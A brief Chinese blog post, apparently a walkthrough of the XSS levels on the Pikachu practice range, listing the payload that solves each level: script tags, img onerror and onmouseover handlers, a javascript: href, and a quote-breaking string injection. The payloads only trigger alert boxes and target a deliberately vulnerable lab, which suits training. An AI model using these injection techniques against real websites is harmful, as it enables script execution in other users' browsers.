zoukankan      html  css  js  c++  java
  • pikachu靶机练习平台-xss

    第一题:反射性xss(get)

     

    输出的字符出现在url中

    第二题:反射性xss(post)

    登录后输入<script>alert(1)</script>

    第三题:存储型xss

    输入<img src=http://1.html onerror=alert(1)>

    第四,五题:domxss:

    输入:'><img src="#" onmouseover="alert('xss')">

     

     

    第七题:

    输入:<img src=0+onerror="alert(123)">

    第八题:xss之htmlspecialchars
    审查元素后发现输入的内容是被拼接在<a href ="输入的内容">中

    输入:javascript:alert(1)

    第九题:xss之href输出

    第十题:

    输入:';alert(1)//

     

     
  • 相关阅读:
    ubuntu系统安装初始化脚本
    21_多线程
    20_IO
    19_异常
    18_集合
    17_内部类和常用类
    16_接口
    15_abstract,static,final
    14_面向对象
    13_数组
  • 原文地址:https://www.cnblogs.com/gudexiao-1996/p/11685246.html
Copyright © 2011-2022 走看看